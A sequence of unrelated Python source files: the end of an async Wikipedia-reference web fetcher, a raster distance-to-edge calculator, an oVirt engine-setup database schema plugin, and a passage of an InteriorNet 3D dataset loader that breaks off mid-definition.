if idx is not None:
fname += ".%d" % idx
return fname
def make_tfrecord_writer(fname):
opts = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.GZIP)
return tf.python_io.TFRecordWriter(fname, opts)
def write_ref_content(url, ref, f):
if not ref:
return False
ex = make_example_from_ref(url, ref)
if ex is None:
return False
f.write(ex.SerializeToString())
return True
async def fetch_url(url, session, side_data):
text = None
try:
async with session.get(url, timeout=10, verify_ssl=False) as response:
if response.status == 200:
text = await response.text()
else:
tf.logging.error("Status %d, url: %s", response.status, url)
except:
# Request can fail for many reasons.
pass
return text, side_data
async def throttled_fetch_url(url, sem, session, side_data):
async with sem:
return await fetch_url(url, session, side_data)
async def fetch_urls(urls,
out_fname,
logging_fnames=None):
tasks = []
connector = aiohttp.TCPConnector(limit_per_host=1)
async with aiohttp.ClientSession(
connector=connector, cookie_jar=aiohttp.DummyCookieJar()) as session:
# Async fetch the urls
sem = asyncio.Semaphore(FLAGS.max_parallel_requests)
for url in urls:
side_data = {"url": url}
task = asyncio.ensure_future(
throttled_fetch_url(url, sem, session, side_data))
tasks.append(task)
tf.logging.info("Async requested %d urls", len(urls))
# Setup output files
file_handles = []
out_f = make_tfrecord_writer(out_fname)
file_handles.append(out_f)
logging_fnames = logging_fnames or {}
samples_f = None
if "samples" in logging_fnames:
samples_f = tf.gfile.Open(logging_fnames["samples"], "w")
file_handles.append(samples_f)
refs_written = [0] # Made a list so can be mutated
def text_extraction_callback(callback_arg):
url, text = callback_arg
written = write_ref_content(url, text, out_f)
if not written:
return
if not refs_written[0] % FLAGS.log_every:
timestamp = datetime.datetime.now().strftime("%H:%M")
tf.logging.info("%s: Wrote ref %d in group", timestamp, refs_written[0])
if samples_f is not None:
samples_f.write(url)
samples_f.write("\n")
samples_f.write(text)
samples_f.write("\n\n---\n\n")
refs_written[0] += 1
try:
# Process each URL as it comes in.
# Using a multiprocessing Pool because the text extraction is expensive
# and so we distribute across cores.
pool = multiprocessing.Pool()
results = []
for task in asyncio.as_completed(tasks):
html, side_data = await task
url = side_data["url"]
if not html:
continue
res = pool.apply_async(mp_get_text, (url, html), {},
text_extraction_callback)
results.append(res)
for res in results:
try:
res.get(timeout=10)
except multiprocessing.TimeoutError:
pass
finally:
for f in file_handles:
f.close()
return refs_written[0]
def get_urls_per_shard(urls_files):
total_urls = 0
per_shard = {}
for urls_file in urls_files:
ref_urls = set()
shard_id = int(os.path.basename(urls_file)[15:20])
with tf.gfile.Open(urls_file) as f:
wiki_urls = json.loads(f.read())
for _, wiki_info in wiki_urls.items():
ref_urls |= set(wiki_info["refs"])
per_shard[shard_id] = list(ref_urls)
total_urls += len(ref_urls)
return per_shard, total_urls
def get_urls_for_shard(urls_dir, shard_id):
urls_file = os.path.join(urls_dir, WIKI_URLS_FILE % shard_id)
urls_per_shard, _ = get_urls_per_shard([urls_file])
assert len(urls_per_shard) == 1
return urls_per_shard[shard_id]
def get_urls_for_shard_group(urls_dir, shard_id, group_id):
shard_urls = get_urls_for_shard(urls_dir, shard_id)
# Deterministic sort and shuffle to prepare for sharding
shard_urls.sort()
random.seed(123)
random.shuffle(shard_urls)
groups = shard(shard_urls, int(math.ceil(len(shard_urls) / URLS_PER_CLIENT)))
group_urls = groups[group_id]
if FLAGS.debug_num_urls:
group_urls = group_urls[:FLAGS.debug_num_urls]
return group_urls
def main(_):
urls = get_urls_for_shard_group(
FLAGS.urls_dir, FLAGS.shard_id, FLAGS.group_id)
tf.logging.info("Fetching %d URLs for shard %d, group %d",
len(urls), FLAGS.shard_id, FLAGS.group_id)
tf.gfile.MakeDirs(FLAGS.out_dir)
out_fname = tfrecord_fname(FLAGS.out_dir, FLAGS.shard_id)
with utils.timing("group_fetch"):
logging_fnames = {}
if FLAGS.log_samples:
logging_fnames["samples"] = os.path.join(
FLAGS.out_dir, "samples.%d.txt" % FLAGS.shard_id)
loop = asyncio.get_event_loop()
num_written = loop.run_until_complete(asyncio.ensure_future(
fetch_urls(urls,
out_fname,
logging_fnames)))
tf.logging.info("Total URLs: %d", len(urls))
tf.logging.info("Num written: %d", num_written)
tf.logging.info("Coverage: %.1f", (num_written / len(urls)) * 100)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
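# Example invocation (a sketch; the script name and output path are assumptions):
#   python3 get_references_web_single_group.py \
#       --out_dir=gs://my-bucket/wiki_references \
#       --shard_id=3 --group_id=0 --max_parallel_requests=50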
|
the-stack_0_25947
|
# Author: David Kerr <[email protected]>
# License: MIT
"""
Module with class to calculate the distance to edge (internal and external) from every source pixel to its closest destination polygon (closest point on polygon).
"""
from pathlib import Path
import geopandas as gpd
import numpy as np
import pandas as pd
import rasterio
from rasterio.merge import merge
import rioxarray
from rioxarray.merge import merge_arrays, merge_datasets
import xarray
from haversine_distance.errors import BlockSizesError
from haversine_distance.utils import check_paths, check_tile_sizes, get_windows, get_points_from_pixels, get_buffer_gdf, clip_using_gdf, dist_to_edge, save_points_to_raster, make_dataset_from_points, get_rtrees, get_rtrees_from_geopackage, distance_to_polygon_edge, make_dataset_from_nodata_points, distance_to_nearest_neighbour, get_corner_buffers, get_corner_points, intersect_points_with_dataset, merge_corner_buffers_and_rebuffer
class DistanceToFeatureEdge:
def __init__(self, in_raster, out_raster, buffer_method='corners', mask=None):
"""
        Class instantiation
Parameters:
------------
in_raster : Path/str
            Path to binary input raster (0 values -> External land pixels to calculate distances; 1 values -> Pixels defined as feature to calculate distances to; NA/NoData values -> 'sea' pixels that will not be calculated (if these distances are needed, then 'sea' pixels should be left as 0))
Raster should be in EPSG:4326 projection
out_raster : Path/str
Path to output raster representing internal and external distances to the edge of the features defined in in_raster
buffer_method : str ('corners'/'centroid')
Method in which to find closest 0 and 1 pixels in global destination raster. 'corners' (Default) can take longer as 4 buffers are required for each tile. 'centroid' is faster but can result in edge effects due to 'closest' pixels being found as a false positive. See README.
mask : Path/str/None
Path to mask raster if distances relative to global (in_raster) raster features are only desired within smaller extent. Raster should have 2 unique values only, one being nodata
Returns:
--------
None
"""
self.in_raster = check_paths(in_raster)
if not check_tile_sizes(in_raster):
            raise BlockSizesError(f"Tile sizes should be square for this program. Please remake {self.in_raster.name} as a tiled raster with square blocks (i.e. >>gdal_translate -a_srs EPSG:4326 -co COMPRESS=LZW -co TILED=YES -co BLOCKXSIZE=512 -co BLOCKYSIZE=512 {str(self.in_raster)} <OUTPUT_NAME.tif>)")
self.out_raster = check_paths(out_raster)
self.buffer_method = buffer_method
if not self.buffer_method in ['corners', 'centroid']:
            raise Exception("Buffer method should be 'corners' or 'centroid'.")
self.dataset = rioxarray.open_rasterio(self.in_raster) # open global raster
def points_generator(self):
"""
Generator yields each block window of self.in_raster as points in geodataframe
Parameters:
-----------
None
Yields:
--------
gdf_pt : gpd.GeoDataFrame OR np.array
GeoDataframe of point OR np.array of nodata values if no valid values in array
"""
nodata = self.dataset._FillValue
for data, window in get_windows(self.in_raster):
if not np.all(data == nodata):
gdf_pt = get_points_from_pixels(self.dataset, window)
else:
gdf_pt = data #This is not a geodataframe
yield gdf_pt, window
def get_rtrees_from_buffer(self, tile):
"""
Iteratively buffers tile's bounds and clips raster dataset using buffer until both 0 AND 1 values are found in the clip. Polygons are then built from the 2 values and rtrees are built and returned
Parameters:
-----------
tile : gpd.GeoDataFrame
Point geodataframe representing raster tile
Returns:
---------
rtree_0 : shapely.strtree.STRtree
STR tree of geometries for polygons/features valued at 0
rtree_1 : shapely.strtree.STRtree
STR tree of geometries for polygons/features valued at 1
"""
pixels_0_and_1_present = False
buffer_multiple = 2
while not pixels_0_and_1_present:
print(f'{buffer_multiple} buffer')
try:
buffer = get_buffer_gdf(tile, diagonal_multiples=buffer_multiple)
clip = clip_using_gdf(buffer, self.dataset)
if (1 in clip) and (0 in clip):
pixels_0_and_1_present = True
rtree_0, rtree_1 = get_rtrees(clip)
else:
buffer_multiple = buffer_multiple * 2
            except MemoryError as e:
                raise MemoryError('Memory exceeded when trying to find closest feature to point') from e
return rtree_0, rtree_1
def get_destination_points_centroid_buffer(self, tile):
"""
Returns geodataframe of points in buffer from tile. Will only return points that are valued 1 and 0. If not present, buffer will keep increasing
Parameters:
-----------
tile : gpd.GeodataFrame
Point geodataframe of raster tile (Source points)
Returns:
--------
gdf_dst : gpd.GeoDataFrame
Point geodataframe of destination points
"""
pixels_0_and_1_present = False
buffer_multiple = 2
############################
while not pixels_0_and_1_present:
try:
buffer = get_buffer_gdf(tile, diagonal_multiples=buffer_multiple)
clip = clip_using_gdf(buffer, self.dataset)
if (1 in clip) and (0 in clip):
pixels_0_and_1_present = True
gdf_dst = get_points_from_pixels(clip, window=None, remove_nodata_before_converting=True)
else:
buffer_multiple = buffer_multiple * 5
            except MemoryError as e:
                raise MemoryError('Memory exceeded when trying to find closest feature to point') from e
return gdf_dst
def get_destination_points_corner_buffer(self, tile):
"""
        Returns geodataframe of points in buffer from tile. Will only return points that are valued 1 and 0. The buffer is calculated by initially buffering from the 4 corners of the tile until 0/1 pixels are found. Corner buffers are then merged and a new buffer is made based on the distance from the tile centroid to the corner buffers' bounding box corner
Parameters:
-----------
tile : gpd.GeodataFrame
Point geodataframe of raster tile (Source points)
Returns:
--------
gdf_dst : gpd.GeoDataFrame
Point geodataframe of destination points
"""
try:
gdf_corners = get_corner_buffers(tile, self.dataset)
buffer = merge_corner_buffers_and_rebuffer(gdf_corners)
dataset_clip = clip_using_gdf(buffer, self.dataset)
gdf_dst = get_points_from_pixels(dataset_clip, window=None, remove_nodata_before_converting=True)
        except MemoryError as e:
            raise MemoryError('Memory exceeded when trying to find closest feature to point') from e
return gdf_dst
def calculate_distance(self, gdf_src, gdf_dst):
"""
Returns gdf with 'dist_to' column appended with distance to closest feature
Parameters:
-----------
self : Instantiated class
gdf : gpd.GeoDataFrame
Point geodataframe representing raster's pixels
"""
gdf_src_nodata = gdf_src[gdf_src['data'] == self.dataset._FillValue]
gdf_src_0 = gdf_src.loc[gdf_src['data'] == 0]
gdf_src_1 = gdf_src.loc[gdf_src['data'] == 1]
gdf_dst_0 = gdf_dst[gdf_dst['data'] == 0]
gdf_dst_1 = gdf_dst[gdf_dst['data'] == 1]
gdf_distance_0 = None
gdf_distance_1 = None
if not gdf_src_0.empty:
gdf_distance_0 = distance_to_nearest_neighbour(gdf_src_0, gdf_dst_1)
if not gdf_src_1.empty:
gdf_distance_1 = distance_to_nearest_neighbour(gdf_src_1, gdf_dst_0)
if not gdf_distance_1 is None:
if not gdf_distance_1.empty:
gdf_distance_1.dist_to = gdf_distance_1.dist_to * -1
if (gdf_distance_0 is not None) and (gdf_distance_1 is None):
if not gdf_distance_0.empty:
gdf_distance = gpd.GeoDataFrame(pd.concat([gdf_distance_0, gdf_src_nodata]))
elif (gdf_distance_1 is not None) and (gdf_distance_0 is None):
if not gdf_distance_1.empty:
                gdf_distance = gpd.GeoDataFrame(pd.concat([gdf_distance_1, gdf_src_nodata]))
else:
gdf_distance = gpd.GeoDataFrame(pd.concat([gdf_distance_0, gdf_distance_1, gdf_src_nodata]))
gdf_distance.loc[gdf_distance.data == 255, 'dist_to'] = -99999999
return gdf_distance
def calculate(self):
"""
        Wrapper function to calculate distance to edge and rasterise output
Parameters:
-----------
self : DistanceToFeatureEdge
Instantiated object
Returns:
---------
None
"""
src = rasterio.open(self.in_raster)
resolution = tuple(src.get_transform()[5:] + src.get_transform()[1:2])
profile = src.profile.copy()
original_nodata = profile['nodata']
src.close()
profile.update({
"driver": "GTiff",
"count": 1,
"dtype": 'int32',
"nodata": -99999999
})
index = 0
with rasterio.open(self.out_raster, 'w', **profile) as dst:
for tile, window in self.points_generator():
if isinstance(tile, np.ndarray):
data = tile.astype(np.int32)
data[data == original_nodata] = dst.nodata
data = data[0]
else:
if self.buffer_method == 'centroid':
gdf_destination = self.get_destination_points_centroid_buffer(tile)
elif self.buffer_method == 'corners':
gdf_destination = self.get_destination_points_corner_buffer(tile)
gdf_dist = self.calculate_distance(tile, gdf_destination)
subset = self.dataset.rio.isel_window(window)
dataset_window = make_dataset_from_points(gdf_dist, resolution, subset)
data = dataset_window.dist_to.values
#tile.to_file(Path(__file__).resolve().parent.parent.joinpath(f'rubbish/tile_{index}.shp'))
#gdf_dist.to_file(Path(__file__).resolve().parent.parent.joinpath(f'rubbish/dist_{index}.shp'))
dst.write(data, 1, window=window)
index += 1
def calculate_dask(self, num_workers=4):
"""
Process calculations and rasterisation using multiple processes using dask
Parameters:
-----------
num_workers : int
Number of parallel processes to use
Returns:
----------
None
"""
import dask
from dask.distributed import Client, LocalCluster, as_completed
from dask import delayed
cluster = LocalCluster(n_workers=num_workers,
threads_per_worker=1,
processes=True,
memory_limit="5GB")
with Client(cluster) as client:
src = rasterio.open(self.in_raster)
resolution = tuple(src.get_transform()[5:] + src.get_transform()[1:2])
profile = src.profile.copy()
original_nodata = profile['nodata']
src.close()
profile.update({
"driver": "GTiff",
"count": 1,
"dtype": 'int32',
"nodata": -99999999
})
index = 0
futures = []
def process_(window, index):
_tile = get_points_from_pixels(self.dataset, window)
if self.buffer_method == 'centroid':
gdf_destination = self.get_destination_points_centroid_buffer(_tile)
elif self.buffer_method == 'corners':
gdf_destination = self.get_destination_points_corner_buffer(_tile)
#gdf_destination = self.get_destination_points(_tile)
gdf_dist = self.calculate_distance(_tile, gdf_destination)
subset = self.dataset.rio.isel_window(window)
dataset_window = make_dataset_from_points(gdf_dist, resolution, subset)
#dataset_window = make_dataset_from_points(gdf_dist, resolution)
data = dataset_window.dist_to.values
data_to_return = {'data': data, 'window': window, 'index': index}
return data_to_return
def process_nodata(data, window, index):
data = data.astype(np.int32)
data[data == original_nodata] = profile['nodata']
data_to_return = {'data': data, 'window': window, 'index': index}
return data_to_return
with rasterio.open(self.out_raster, 'w', **profile) as dst, rasterio.open(self.in_raster) as src:
for ij, window in src.block_windows():
data = src.read(1, window=window)
if np.all(data == original_nodata):
future = client.submit(process_nodata, data, window, index)
futures.append(future)
else:
future = client.submit(process_, window, index)
futures.append(future)
index += 1
completed = as_completed(futures)
for i in completed:
dst.write(i.result()['data'], 1, window=i.result()['window'])
print(i.result()['index'])
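# Example usage (a minimal sketch; the file names and worker count are hypothetical):
# dist = DistanceToFeatureEdge('global_binary.tif', 'distance_to_edge.tif', buffer_method='corners')
# dist.calculate()                        # single process
# dist.calculate_dask(num_workers=8)      # or distribute the tiles with dask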
|
the-stack_0_25948
|
#
# ovirt-engine-setup -- ovirt engine setup
# Copyright (C) 2013-2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Schema plugin."""
import gettext
import os
from otopi import constants as otopicons
from otopi import plugin
from otopi import transaction
from otopi import util
from ovirt_engine_setup import constants as osetupcons
from ovirt_engine_setup.engine import constants as oenginecons
from ovirt_engine_setup.engine_common import constants as oengcommcons
from ovirt_engine_setup.engine_common import database
def _(m):
return gettext.dgettext(message=m, domain='ovirt-engine-setup')
@util.export
class Plugin(plugin.PluginBase):
"""Schema plugin."""
class SchemaTransaction(transaction.TransactionElement):
"""DB Schema transaction element."""
def __init__(self, parent, backup=None):
self._parent = parent
self._backup = backup
def __str__(self):
return _("Engine schema Transaction")
def prepare(self):
pass
def abort(self):
self._parent.logger.info(_('Rolling back database schema'))
try:
dbovirtutils = database.OvirtUtils(
plugin=self._parent,
dbenvkeys=oenginecons.Const.ENGINE_DB_ENV_KEYS,
)
self._parent.logger.info(
_('Clearing Engine database {database}').format(
database=self._parent.environment[
oenginecons.EngineDBEnv.DATABASE
],
)
)
dbovirtutils.clearDatabase()
if self._backup is not None and os.path.exists(self._backup):
self._parent.logger.info(
_('Restoring Engine database {database}').format(
database=self._parent.environment[
oenginecons.EngineDBEnv.DATABASE
],
)
)
dbovirtutils.restore(backupFile=self._backup)
except Exception as e:
self._parent.logger.debug(
'Error during Engine database restore',
exc_info=True,
)
self._parent.logger.error(
_('Engine database rollback failed: {error}').format(
error=e,
)
)
def commit(self):
pass
def __init__(self, context):
super(Plugin, self).__init__(context=context)
def _checkCompatibilityVersion(self):
statement = database.Statement(
dbenvkeys=oenginecons.Const.ENGINE_DB_ENV_KEYS,
environment=self.environment,
)
supported = set([
x.strip()
for x in self.environment[
osetupcons.CoreEnv.UPGRADE_SUPPORTED_VERSIONS
].split(',')
if x.strip()
])
vms = statement.execute(
statement="""
select
vm_name,
custom_compatibility_version
from
vms
where
custom_compatibility_version is not null
and
custom_compatibility_version <> '';
""",
ownConnection=True,
transaction=False,
)
if vms:
names = [
vm['vm_name']
for vm in vms if
vm['custom_compatibility_version']
not in supported
]
if names:
raise RuntimeError(
_(
'Cannot upgrade the Engine due to low '
'custom_compatibility_version for virtual machines: '
                        '{r}. Please edit these virtual machines: in the Edit VM '
'dialog go to System->Advanced Parameters -> Custom '
'Compatibility Version and either reset to empty '
'(cluster default) or set a value supported by the '
'new installation: {s}.'
).format(
r=names,
s=', '.join(sorted(supported)),
)
)
def _checkInvalidImages(self):
statement = database.Statement(
dbenvkeys=oenginecons.Const.ENGINE_DB_ENV_KEYS,
environment=self.environment,
)
invalidImagesForVms = statement.execute(
statement="""
SELECT
disk_alias,
image_guid,
vm_name
FROM
images
INNER JOIN vm_device ON
images.image_group_id = vm_device.device_id
INNER JOIN vm_static ON vm_device.vm_id = vm_static.vm_guid
INNER JOIN base_disks ON
images.image_group_id = base_disks.disk_id
AND vm_static.entity_type = 'VM'
AND vm_device.type = 'disk'
AND vm_device.device = 'disk'
AND images.vm_snapshot_id =
'00000000-0000-0000-0000-000000000000';
""",
ownConnection=True,
transaction=False,
)
if invalidImagesForVms:
self.logger.warn(
_(
'Engine DB is inconsistent due to the existence of invalid'
' {num} image(s) for virtual machine(s) as follows:\n'
'{imagesList}.\n'
'\nPlease consult support to resolve this issue. '
'Note that the upgrade will be blocked in the subsequent '
'release (4.3) if the issue isn\'t resolved.\n'
'If you choose to ignore this problem then snapshot '
'operations on the above virtual machine(s) may fail or '
'may corrupt the disk(s).\nTo fix this issue, you can '
'clone the virtual machine(s) by starting the engine, '
'searching for the affected\nvirtual machine(s) by name '
'(as listed above) and clicking on \'Clone VM\' for each '
'virtual machine in the list.\n'
'Warning: If there are snapshots for the cloned virtual '
'machine(s), they will be collapsed.\n\n'
).format(
num=len(invalidImagesForVms),
imagesList=invalidImagesForVms
)
)
def _checkDatabaseOwnership(self):
statement = database.Statement(
dbenvkeys=oenginecons.Const.ENGINE_DB_ENV_KEYS,
environment=self.environment,
)
result = statement.execute(
statement="""
select
nsp.nspname as object_schema,
cls.relname as object_name,
rol.rolname as owner,
case cls.relkind
when 'r' then 'TABLE'
when 'i' then 'INDEX'
when 'S' then 'SEQUENCE'
when 'v' then 'VIEW'
when 'c' then 'TYPE'
else
cls.relkind::text
end as object_type
from
pg_class cls join
pg_roles rol on rol.oid = cls.relowner join
pg_namespace nsp on nsp.oid = cls.relnamespace
where
nsp.nspname not in ('information_schema', 'pg_catalog') and
nsp.nspname not like 'pg_%%' and
cls.relname not like 'pg_%%' and
rol.rolname != %(user)s
order by
nsp.nspname,
cls.relname
""",
args=dict(
user=self.environment[oenginecons.EngineDBEnv.USER],
),
ownConnection=True,
transaction=False,
)
if len(result) > 0:
raise RuntimeError(
_(
'Cannot upgrade the Engine database schema due to wrong '
'ownership of some database entities.\n'
)
)
def _checkSupportedVersionsPresent(self):
# TODO: figure out a better way to do this for the future
statement = database.Statement(
dbenvkeys=oenginecons.Const.ENGINE_DB_ENV_KEYS,
environment=self.environment,
)
dcVersions = statement.execute(
statement="""
SELECT name, compatibility_version FROM storage_pool;
""",
ownConnection=True,
transaction=False,
)
clusterTable = statement.execute(
statement="""
SELECT table_name FROM information_schema.tables
WHERE table_name IN ('vds_groups', 'cluster');
""",
ownConnection=True,
transaction=False,
)
sql = _(
'SELECT name, compatibility_version FROM {table};'
).format(
table=clusterTable[0]['table_name']
)
clusterVersions = statement.execute(
statement=sql,
ownConnection=True,
transaction=False,
)
versions = set([
x['compatibility_version']
for x in dcVersions + clusterVersions
])
supported = set([
x.strip()
for x in self.environment[
osetupcons.CoreEnv.UPGRADE_SUPPORTED_VERSIONS
].split(',')
if x.strip()
])
if versions - supported:
for (queryres, errmsg) in (
(
dcVersions,
_(
'The following Data Centers have a too old '
'compatibility level, please upgrade them:'
)
),
(
clusterVersions,
_(
'The following Clusters have a too old '
'compatibility level, please upgrade them:'
)
),
):
objs = [
x['name']
for x in queryres
if x['compatibility_version'] not in supported
]
if objs:
self.logger.error(errmsg)
self.dialog.note('\n'.join(objs))
raise RuntimeError(
_(
'Trying to upgrade from unsupported versions: {versions}'
).format(
versions=' '.join(versions - supported)
)
)
@plugin.event(
stage=plugin.Stages.STAGE_VALIDATION,
after=(
oengcommcons.Stages.DB_CREDENTIALS_AVAILABLE_EARLY,
),
condition=lambda self: (
self.environment[oenginecons.CoreEnv.ENABLE] and
not self.environment[
oenginecons.EngineDBEnv.NEW_DATABASE
]
),
)
def _validation(self):
self._checkDatabaseOwnership()
self._checkSupportedVersionsPresent()
self._checkCompatibilityVersion()
self._checkInvalidImages()
@plugin.event(
stage=plugin.Stages.STAGE_MISC,
name=oengcommcons.Stages.DB_SCHEMA,
after=(
oengcommcons.Stages.DB_CREDENTIALS_AVAILABLE_LATE,
),
condition=lambda self: self.environment[oenginecons.CoreEnv.ENABLE],
)
def _misc(self):
backupFile = None
# If we are upgrading to a newer postgresql, do not backup or rollback.
# If we upgrade by copying, we can rollback by using the old
# version. If we upgrade in-place, we do not support rollback,
# and user should take care of backups elsewhere.
if not self.environment[
oenginecons.EngineDBEnv.NEED_DBMSUPGRADE
]:
if not self.environment[
oenginecons.EngineDBEnv.NEW_DATABASE
]:
dbovirtutils = database.OvirtUtils(
plugin=self,
dbenvkeys=oenginecons.Const.ENGINE_DB_ENV_KEYS,
)
backupFile = dbovirtutils.backup(
dir=self.environment[
oenginecons.ConfigEnv.OVIRT_ENGINE_DB_BACKUP_DIR
],
prefix=oenginecons.Const.ENGINE_DB_BACKUP_PREFIX,
)
self.environment[otopicons.CoreEnv.MAIN_TRANSACTION].append(
self.SchemaTransaction(
parent=self,
backup=backupFile,
)
)
self.logger.info(_('Creating/refreshing Engine database schema'))
args = [
oenginecons.FileLocations.OVIRT_ENGINE_DB_SCHMA_TOOL,
'-s', self.environment[oenginecons.EngineDBEnv.HOST],
'-p', str(self.environment[oenginecons.EngineDBEnv.PORT]),
'-u', self.environment[oenginecons.EngineDBEnv.USER],
'-d', self.environment[oenginecons.EngineDBEnv.DATABASE],
'-l', self.environment[otopicons.CoreEnv.LOG_FILE_NAME],
'-c', 'apply',
]
if self.environment[
osetupcons.CoreEnv.DEVELOPER_MODE
]:
if not os.path.exists(
oenginecons.FileLocations.OVIRT_ENGINE_DB_MD5_DIR
):
os.makedirs(
oenginecons.FileLocations.OVIRT_ENGINE_DB_MD5_DIR
)
args.extend(
[
'-m',
os.path.join(
oenginecons.FileLocations.OVIRT_ENGINE_DB_MD5_DIR,
'%s-%s.scripts.md5' % (
self.environment[
oenginecons.EngineDBEnv.HOST
],
self.environment[
oenginecons.EngineDBEnv.DATABASE
],
),
),
]
)
rc, stdout, stderr = self.execute(
args=args,
envAppend={
'DBFUNC_DB_PGPASSFILE': self.environment[
oenginecons.EngineDBEnv.PGPASS_FILE
]
},
raiseOnError=False,
)
if rc:
self.logger.error(
'%s: %s',
os.path.basename(
oenginecons.FileLocations.OVIRT_ENGINE_DB_SCHMA_TOOL
),
stderr[-1]
)
raise RuntimeError(_('Engine schema refresh failed'))
# vim: expandtab tabstop=4 shiftwidth=4
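# For reference, a sketch (with hypothetical values) of the schema-tool command that
# _misc() assembles above:
#   DBFUNC_DB_PGPASSFILE=<pgpass file> <OVIRT_ENGINE_DB_SCHMA_TOOL> \
#       -s localhost -p 5432 -u engine -d engine -l <setup log file> -c apply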
|
the-stack_0_25950
|
import math
import os
import random
import re
import numpy as np
import sys
from PIL import Image
from viewformer.utils import SplitIndices
from viewformer.utils.geometry import look_at_to_cameras
from viewformer.data._common import ArchiveStore
from viewformer.data._common import ShuffledLoader
class _InteriorNetLoader:
_custom_shuffle = True
def __init__(self, path: str, sequence_size: int = None, max_environments_per_scene: int = -1, seed: int = 42,
parts: SplitIndices = None, shuffle_sequence_items: bool = None, shuffle_sequences: bool = False, split: str = None):
if parts is None:
parts = SplitIndices('7')
dataset_parts = parts.restrict(range(1, 8))
assert max_environments_per_scene, 'Currently, only max_environments_per_scene=1 is supported'
assert not shuffle_sequences
assert split in {'train', 'test'}
self.images_per_environment = sequence_size or 20
self.max_environments_per_scene = max_environments_per_scene
# NOTE: These ignored files can likely be removed
        # The following files were probably incorrectly downloaded
# We will keep them for reproducibility
# NOTE: also, all tar files were converted to zip
self._ignored_files = [
'3FO4K5I8T7KR', '3FO4K5I8T7KR', '3FO4K3GYULI6', '3FO4K5I8T7KR',
'3FO4K35GPEA7', '3FO4K6XVLSCH', '3FO4K33RY528', '3FO4JXJX64SU',
'3FO4K5LPQL51', '3FO4K6YTSO3Y', '3FO4K6WXLP01', ]
# NOTE first 3% are testing data
self._environment_files = []
self._hd16_len = 0
self._hd7_len = 0
self._images_per_scene = (3000, 20)
self._environment_per_scene = tuple(
min(max_environments_per_scene, x // self.images_per_environment)
if max_environments_per_scene > 0
else x // self.images_per_environment for x in self._images_per_scene)
assert os.path.exists(os.path.join(path, 'GroundTruth_HD1-HD6')), 'Not a valid dataset, missing GroundTruth_HD1-HD6 folder'
for i in sorted(dataset_parts):
assert os.path.exists(os.path.join(path, f'HD{i}')), f'Not a valid dataset, missing HD{i} folder'
part_files = [os.path.join(path, f'HD{i}', x) for x in ArchiveStore.list_archives(os.path.join(path, f'HD{i}')) if x not in self._ignored_files]
part_files = sorted(part_files)
if split is not None:
num_test = int(math.ceil(len(part_files) * 0.03))
if split == 'test':
part_files = part_files[:num_test]
else:
part_files = part_files[num_test:]
self._environment_files.extend(part_files)
if i < 7:
self._hd16_len += len(part_files)
else:
self._hd7_len += len(part_files)
self._ctx = None
self.shuffle_environment = shuffle_sequence_items
def get_intrinsics(self):
# Return (image_height, image_width, f_x, f_y, c_x, c_y)
return (640, 480, 600, 600, 320, 240)
def __len__(self):
hd16_size, hd7_size = self._environment_per_scene
return self._hd16_len * hd16_size + self._hd7_len * hd7_size
def num_images_per_sequence(self):
return [self.images_per_environment] * len(self)
def _rotate_system(self, pos):
x, y, z = np.moveaxis(pos, -1, 0)
return np.stack((y, -z, -x), -1)
def _convert_poses(self, poses):
# first three elements, eye and next three, lookAt and the last there, up direction
eye = self._rotate_system(poses[..., 0:3])
lookat = self._rotate_system(poses[..., 3:6])
up = self._rotate_system(poses[..., 6:9])
return look_at_to_cameras(eye, lookat, up)
def close(self):
if self._ctx is not None:
self._ctx.__exit__()
self._ctx = None
def _ensure_context(self):
if self._ctx is None:
self._ctx = ArchiveStore.with_context().__enter__()
def __enter__(self, *args, **kwargs):
self._ensure_context()
return self
def __exit__(self, *args, **kwargs):
self.close()
def _parse_cam(self, file):
last_id = None
for line in file:
line = line.rstrip('\n\r')
vals = line.split()
if vals[0].isnumeric():
if last_id != vals[0]:
yield vals[0], np.array([float(x) for x in vals[1:]], dtype='float32')
last_id = vals[0]
def __getitem__(self, i):
self._ensure_context()
hd16_size, hd7_size = self._environment_per_scene
if i >= self._hd16_len * hd16_size:
env_i = (i - self._hd16_len * hd16_size) // hd7_size + self._hd16_len
i = (i - self._hd16_len * hd16_size) % hd7_size
is_hd16 = False
else:
env_i = i // hd16_size
i = i % hd16_size
is_hd16 = True
fname = self._environment_files[env_i]
images = []
# depthmaps = []
cameras = []
data = []
with ArchiveStore(fname) as archive:
if is_hd16:
par_dir, archivename = os.path.split(fname)
par_dir = os.path.join(os.path.dirname(par_dir), 'GroundTruth_HD1-HD6')
with ArchiveStore(os.path.join(par_dir, archivename)) as gt_archive:
subdirs = [re.match(r'^.*(\d+_\d+)$', x) for x in gt_archive.ls('')]
subdir_postfixes = [x.group(1) for x in subdirs if x is not None]
subdirs = [f'original_{x}/' for x in subdir_postfixes]
for subdir, postfix in zip(subdirs, subdir_postfixes):
with gt_archive.open(f'velocity_angular_{postfix}/cam0.render', 'r') as f:
for pose_id, pose_data in self._parse_cam(f):
data.append((subdir, pose_id, pose_data))
else:
with archive.open('cam0.render', 'r') as f:
for pose_id, pose_data in self._parse_cam(f):
data.append(('', pose_id, pose_data))
rng = random.Random(env_i)
if self.shuffle_environment:
rng.shuffle(data)
num_resamples = 0
rng.seed(i)
def try_add(i):
nonlocal num_resamples
subdir, pose_id, pose_data = data[i]
try:
image = np.array(Image.open(archive.open(f'{subdir}cam0/data/{pose_id}.png', 'rb')).convert('RGB'))
# depthmap = np.array(Image.open(archive.open(f'{subdir}depth0/data/{pose_id}.png', 'rb')).convert('F'))
images.append(image)
# depthmaps.append(depthmap)
cameras.append(pose_data)
except Exception as e:
print(f'Invalid image file "{subdir}cam0/data/{pose_id}.png" or "{subdir}depth0/data/{pose_id}.png" in archive {fname}', file=sys.stderr)
if num_resamples >= 1:
raise e
num_resamples += 1
try_add(rng.randrange(0, len(data)))
for j in range(i * self.images_per_environment, (i + 1) * self.images_per_environment):
try_add(j)
output = dict()
cameras = np.stack(cameras, 0)
cameras = self._convert_poses(cameras)
output['cameras'] = cameras
output['frames'] = np.stack(images, 0)
# output['depthmaps'] = np.stack(depthmaps, 0)
return output
class InteriorNetLoader(_InteriorNetLoader):
